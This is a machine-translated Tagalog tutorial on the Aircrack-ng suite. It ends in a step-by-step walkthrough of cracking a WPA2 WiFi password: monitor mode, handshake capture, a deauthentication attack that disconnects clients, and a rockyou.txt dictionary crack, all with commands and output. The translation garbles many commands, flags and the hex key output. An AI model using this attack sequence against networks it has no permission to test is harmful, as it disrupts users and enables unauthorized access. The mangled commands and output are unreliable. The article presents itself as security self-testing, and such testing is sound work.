Paano Gumamit ng Aircrack-ng

How Use Aircrack Ng



Karamihan sa mga oras, ang mga tao ay hindi kailanman nag-iisip tungkol sa network kung saan sila ay konektado. Hindi nila kailanman iniisip kung gaano kaligtas ang network na iyon at kung gaano nila ipagsapalaran ang kanilang kumpidensyal na data sa araw-araw. Maaari mong patakbuhin ang mga pagsusuri sa kahinaan sa iyong mga network ng wifi sa pamamagitan ng paggamit ng napakalakas na tool na tinawag Aircrack-ng at Wireshark. Ginagamit ang Wireshark upang subaybayan ang aktibidad ng network. Aircrack-ng ay mas katulad ng isang agresibong tool na hinahayaan kang mag-hack at magbigay ng access sa mga wireless na koneksyon. Ang pag-iisip bilang isang nanghihimasok ay palaging ang pinakaligtas na paraan upang maprotektahan ang iyong sarili laban sa isang pag-hack. Maaari mong maunawaan ang eksaktong mga aksyon na gagawin ng isang nanghihimasok upang makakuha ng pag-access sa iyong system sa pamamagitan ng pag-alam tungkol sa aircrack. Maaari ka nang magsagawa ng mga pagsusuri sa pagsunod sa iyong sariling system upang matiyak na hindi ito ligtas.

Aircrack-ng ay isang buong hanay ng software na idinisenyo upang subukan ang seguridad ng WiFi network. Hindi lamang ito isang solong tool ngunit isang koleksyon ng mga tool, na ang bawat isa ay nagsasagawa ng isang partikular na layunin. Ang iba`t ibang mga lugar ng seguridad ng wifi ay maaaring magtrabaho, tulad ng pagsubaybay sa Access Point, pagsubok, pag-atake sa network, pag-crack ng wifi network, at pagsubok dito. Ang pangunahing layunin ng Aircrack ay upang maharang ang mga packet at maintindihan ang mga hash upang masira ang mga password. Sinusuportahan nito ang halos lahat ng mga bagong wireless interface. Aircrack-ng ay isang pinabuting bersyon ng isang hindi napapanahong tool suite na Aircrack, ng tumutukoy sa Bagong henerasyon . Ang ilan sa mga kahanga-hangang tool na nagtutulungan sa pagkuha ng isang mas malaking gawain.







Airmon-ng:

Ang Airmon-ng ay kasama sa aircrack-ng kit na naglalagay ng network interface card sa mode ng monitor. Karaniwang tatanggap lamang ang mga card ng network ng mga packet na naka-target para sa kanila tulad ng tinukoy ng MAC address ng NIC, ngunit sa airmon-ng, lahat ng mga wireless packet, naka-target man para sa kanila o hindi, ay tatanggapin din. Dapat mong mahuli ang mga packet na ito nang hindi nagli-link o nagpapatotoo sa access point. Ginagamit ito upang suriin ang katayuan ng isang Access Point sa pamamagitan ng paglalagay ng interface ng network sa monitor mode. Una dapat isaayos ng isa ang mga wireless card upang i-on ang mode ng monitor, pagkatapos ay patayin ang lahat ng mga proseso sa background kung sa palagay mo ay ang anumang proseso ay nakagagambala dito. Matapos wakasan ang mga proseso, ang mode na monitor ay maaaring paganahin sa wireless interface sa pamamagitan ng pagpapatakbo ng utos sa ibaba:



[protektado ng email]: ~ $sudoairmon-ng start wlan0#

Maaari mo ring hindi paganahin ang mode ng monitor sa pamamagitan ng pagtigil sa airmon-ng anumang oras sa pamamagitan ng paggamit ng utos sa ibaba:

[protektado ng email]: ~ $sudoairmon-ng stop wlan0#

Airodump-ng:

Ginagamit ang Airodump-ng upang ilista ang lahat ng mga network na nakapalibot sa amin at upang matingnan ang mahalagang impormasyon tungkol sa mga ito. Ang pangunahing pagpapaandar ng airodump-ng ay ang pagsinghot ng mga packet, kaya mahalagang na-program upang makuha ang lahat ng mga packet sa paligid natin habang inilalagay sa mode ng monitor. Patakbuhin namin ito laban sa lahat ng mga koneksyon sa paligid namin at magtipon ng data tulad ng bilang ng mga kliyente na konektado sa network, ang kanilang kaukulang mac address, istilo ng pag-encrypt, at mga pangalan ng channel at pagkatapos ay simulang i-target ang aming target na network.

Sa pamamagitan ng pagta-type ng airodump-ng utos at pagbibigay dito ng pangalan ng network interface bilang parameter, maaari nating buhayin ang tool na ito. Ililista nito ang lahat ng mga access point, ang dami ng mga packet ng data, mga pamamaraan ng pag-encrypt at pagpapatotoo na ginamit, at ang pangalan ng network (ESSID). Mula sa isang pananaw sa pag-hack, ang mga mac address ang pinakamahalagang larangan.

[protektado ng email]: ~ $sudoairodump-ng wlx0mon

Aircrack-ng:

Ginamit ang Aircrack para sa pag-crack ng password. Matapos makuha ang lahat ng mga packet gamit ang airodump, maaari naming i-crack ang susi sa pamamagitan ng aircrack. Pinuputol nito ang mga key na ito gamit ang dalawang pamamaraan na PTW at FMS. Ang diskarte ng PTW ay ginagawa sa dalawang yugto. Sa una, ang mga packet lamang ng ARP ang ginagamit, at pagkatapos lamang, kung ang key ay hindi basag pagkatapos ng paghahanap, gumagamit ito ng lahat ng iba pang mga nakuhang packet. Ang isang plus point ng diskarte ng PTW ay hindi lahat ng mga packet ay ginagamit para sa pag-crack. Sa pangalawang diskarte, ibig sabihin, FMS, ginagamit namin ang parehong mga modelong pang-istatistika at ang brute force algos para sa pag-crack ng susi. Maaari ding gamitin ang isang paraan ng diksiyunaryo.

Aireplay-ng:

Ipinakikilala ng Airplay-ng ang mga packet sa isang wireless network upang lumikha o mapabilis ang trapiko. Ang mga packet mula sa dalawang magkakaibang mapagkukunan ay maaaring makuha ng aireplay-ng. Ang una ay ang live network, at ang pangalawa ay ang mga packet mula sa mayroon nang pcap file. Ang Airplay-ng ay kapaki-pakinabang sa panahon ng isang pag-atake ng deauthentication na nagta-target sa isang wireless access point at isang gumagamit. Bukod dito, maaari kang magsagawa ng ilang mga pag-atake tulad ng pag-atake ng latte ng kape sa airplay-ng, isang tool na nagbibigay-daan sa iyo upang makakuha ng isang susi mula sa system ng kliyente. Maaari mong makamit ito sa pamamagitan ng pagkuha ng isang ARP packet at pagkatapos ay manipulahin ito at ibalik ito sa system. Lilikha ang kliyente ng isang packet na maaaring makuha ng airodump at aircrack na bitak ang susi mula sa nabagong packet. Ang ilan pang mga pagpipilian sa pag-atake ng airplay-ng ay may kasamang chopchop, fragment arepreplay, atbp.

Airbase-ng:

Ginagamit ang Airbase-ng upang ibahin ang anyo ang computer ng isang nanghihimasok sa isang nakompromiso na punto ng koneksyon para mai-link ang iba. Gamit ang Airbase-ng, maaari kang mag-claim na maging isang ligal na access point at magsagawa ng man-in-the-middle na pag-atake sa mga computer na nakakabit sa iyong network. Ang mga ganitong uri ng pag-atake ay tinatawag na Evil Twin Attacks. Imposibleng makilala ng pangunahing mga gumagamit ang isang ligal na access point at isang pekeng access point. Kaya, ang masamang banta ng kambal ay kabilang sa pinaka-nagbabantang mga pagbabanta sa wireless na kinakaharap natin ngayon.

Airolib-ng:

Pinapabilis ng Airolib ang proseso ng pag-hack sa pamamagitan ng pag-iimbak at pamamahala ng mga listahan ng password at ang access point. Ang sistema ng pamamahala ng database na ginamit ng program na ito ay SQLite3, na karamihan ay magagamit sa lahat ng mga platform. Kasama sa pag-crack ng password ang pagkalkula ng pares ng master key kung saan ang pribadong pansamantalang key (PTK) ay nakuha. Gamit ang PTK, maaari mong matukoy ang code ng pagkakakilanlan ng mensahe ng frame (MIC) para sa isang naibigay na packet at teoretikal na hanapin ang MIC na maging katulad ng packet, kaya kung tama ang PTK, tama rin ang PMK.

Upang makita ang mga listahan ng password at ma-access ang mga network na nakaimbak sa database, i-type ang sumusunod na utos:

[protektado ng email]: ~ $sudoairolib-ng testdatabase –stats

Dito ang testdatabase ay ang db kung saan mo nais i-access o likhain, at –stats ang operasyon na nais mong gawin dito. Maaari kang gumawa ng maramihang mga pagpapatakbo sa mga patlang ng database, tulad ng pagbibigay ng maximum na priyoridad sa ilang SSID o anumang bagay. Upang magamit ang airolib-ng sa aircrack-ng, ipasok ang sumusunod na utos:

[protektado ng email]: ~ $sudoaircrack-ng-rtestdatabase wpa2.eapol.cap

Narito ginagamit namin ang naka-compute na PMK's na nakaimbak sa pagsubok database para sa pagpapabilis ng proseso ng pag-crack ng password.

Pag-crack ng WPA / WPA2 gamit ang Aircrack-ng:

Tingnan natin ang isang maliit na halimbawa ng kung ano ang magagawa ng aircrack-ng sa tulong ng ilan sa mga kahanga-hangang tool nito. Sisiklain namin ang isang paunang nakabahaging key ng isang WPA / WPA2 network gamit ang isang paraan ng diksyunaryo.

Ang unang bagay na kailangan nating gawin ay upang ilista ang mga interface ng network na sumusuporta sa mode ng monitor. Maaari itong magawa gamit ang sumusunod na utos:

[protektado ng email]: ~ $sudoairmon-ng

PHY Interface Driver Chipset

Phy0 wlx0 rtl8xxxu Realtek Semiconductor Corp.

Maaari naming makita ang isang interface; Ngayon, kailangan nating ilagay ang interface ng network na aming nahanap (wlx0) sa monitor mode gamit ang sumusunod na utos:

[protektado ng email]: ~ $sudoairmon-ng start wlx0

Pinagana nito ang mode ng monitor sa interface na tinatawag wlx0mon .

Ngayon dapat naming simulan ang pakikinig sa mga pag-broadcast ng mga kalapit na router sa pamamagitan ng aming interface ng network na inilagay namin sa mode ng monitor.

[protektado ng email]: ~ $sudoairodump-ng wlx0mon

CH5 ][Lumipas:30s][ 2020-12-02 00:17



BSSID PWR Beacons#Data, # / s CH MB ENC CIPHER AUTH ESSID



E4: 6F:13: 04: CE:31 -Apat na lima 62 27 0 154e WPA2 CCMP PSK CrackIt

C4: E9:84:76:10: MAGING-63 77 0 0 654e. WPA2 CCMP PSK Hackme

C8: 3A:35: A0: 4E: 01-63 84 0 0 854e WPA2 CCMP PSK Net07

74: GIVES:88: FA:38: 02-68 28 2 0 labing-isang54e WPA2 CCMP PSK TP-Link_3802



BSSID STATION PWR Rate Nawala ang Mga Frames Probe



E4: 6F:13: 04: CE:315C: 3A:Apat lima: D7: EA: 8B -3 0- 1e8 5

E4: 6F:13: 04: CE:31C4:67: D3: C2: CD: D7 -331e- 6e0 3

E4: 6F:13: 04: CE:315C: C3: 07:56:61: EF -35 0-1 0 6

E4: 6F:13: 04: CE:31BC:91: B5: F8: 7E: D5 -390e-1 1002 13

Ang aming target na network ay Crackit sa kasong ito, na kasalukuyang tumatakbo sa channel 1.

Dito upang mai-crack ang password ng target na network, kailangan naming makuha ang isang 4-way na pagkakamay, na nangyayari kapag sinusubukan ng isang aparato na kumonekta sa isang network. Maaari nating makuha ito sa pamamagitan ng paggamit ng sumusunod na utos:

[protektado ng email]: ~ $sudoairodump-ng-c 1--bssid E4: 6F:13: 04: CE:31 -sa /bahay wlx0

-c : Channel

–Bss : Bssid ng target na network

-sa : Ang pangalan ng direktoryo kung saan ilalagay ang file ng pcap

Ngayon kailangan nating maghintay para sa isang aparato upang kumonekta sa network, ngunit may isang mas mahusay na paraan upang makuha ang isang handshake. Maaari naming madi-deacte ang mga aparato sa AP gamit ang isang pag-atake ng deauthentication gamit ang sumusunod na utos:

[protektado ng email]: ~ $sudoaireplay-ng-0 -saE4: 6F:13: 04: CE:31

sa : Bssid ng target na network

-0 : pag-atake ng deauthentication

Na-disconnect namin ang lahat ng mga aparato, at ngayon kailangan naming maghintay para sa isang aparato upang kumonekta sa network.

CH1 ][Lumipas:30s][ 2020-12-02 00:02][Handshake ng WPA: E4: 6F:13: 04: CE:31



BSSID PWR RXQ Beacons#Data, # / s CH MB ENC CIPHER AUTH E



E4: 6F:13: 04: CE:31 -47 1 228 807 36 1Ika-54 WPA2 CCMP PSK P



BSSID STATION PWR Rate Nawala ang Mga Frames Probe



E4: 6F:13: 04: CE:31BC:91: B5: F8: 7E: D5 -35 0-1 0 1

E4: 6F:13: 04: CE:315C: 3A:Apat lima: D7: EA: 8B -290e- 1e0 22

E4: 6F:13: 04: CE:31 88:28: B3:30:27: 7E -310e-1 0 32

E4: 6F:13: 04: CE:31C4:67: D3: C2: CD: D7 -350e- 6e263 708CrackIt

E4: 6F:13: 04: CE:31D4: 6A: 6A:99: ED: E3 -350e- 0e0 86

E4: 6F:13: 04: CE:315C: C3: 07:56:61: EF -37 0- 1e0 1

Na-hit kami, at sa pamamagitan ng pagtingin sa kanang tuktok na sulok sa tabi mismo ng oras, nakikita naming nakakuha ng isang kamayan. Ngayon tingnan ang tinukoy na folder ( / bahay sa aming kaso) para sa a .pcap file

Upang ma-crack ang WPA key, maaari naming gamitin ang sumusunod na utos:

[protektado ng email]: ~ $sudoaircrack-ng-a2 -sarockyou.txt-bE4: 6F:13: 04: CE:31pagkakamayan.cap

b: Bssid ng target na network

-a2: WPA2 mode

Rockyou.txt: Ang diksyonaryofileginamit na

Handshake.cap: Angfile alinnaglalaman ng nakunan ng kamayan

Aircrack-ng1.2beta3

[00:01:49] 10566sinubukan ang mga susi(1017.96sa/s)

SUSI NA Nahanap! [nakuha mo ako]

Master Key: 8D EC 0C EA D2 BC 6B H7 J8 K1 A0896B 7B 6D

0C 06 08 ED BC 6B H7 J8 K1 A0896B 7B B F7 6FlimampuC


Transient Key: 4D C4 5R 6T76 996G 7H 8D EC

H7 J8 K1 A0896B 7B 6D AF 5B 8D 2D A0896B

A5 BD K1 A0896B 0C 08 0C 06 08 ED BC 6B H7 J8 K1 A089

8D EC 0C EA D2 BC 6B H7 J8 K1 A0896B

MAC: CB 5A F8 CE62B2 1B F7 6FlimampuC025 62E9 5D71

Ang susi sa aming target na network ay matagumpay na nasira.

Konklusyon:

Ang mga wireless network ay saanman, ginagamit ng bawat kumpanya, mula sa mga manggagawa na gumagamit ng mga smartphone hanggang sa mga pang-industriyang kontrol na aparato. Ayon sa pananaliksik, halos higit sa 50 porsyento ng trapiko sa internet ay higit sa WiFi sa 2021. Ang mga wireless network ay maraming pakinabang, ang komunikasyon sa labas ng mga pintuan, mabilis na pag-access sa internet sa mga lugar kung saan halos imposibleng maglatag ng mga wire, ay maaaring mapalawak ang network nang hindi nag-i-install ng mga kable para sa anumang ibang gumagamit, at madaling maiugnay ang iyong mga mobile device sa iyong mga tanggapan sa bahay habang wala ka roon.

Sa kabila ng mga kalamangan na ito, mayroong isang malaking marka ng tanong tungkol sa iyong privacy at seguridad. Tulad ng mga network na ito; sa loob ng saklaw ng paglilipat ng mga router ay bukas sa lahat, madali silang maaatake, at ang iyong data ay madaling makompromiso. Halimbawa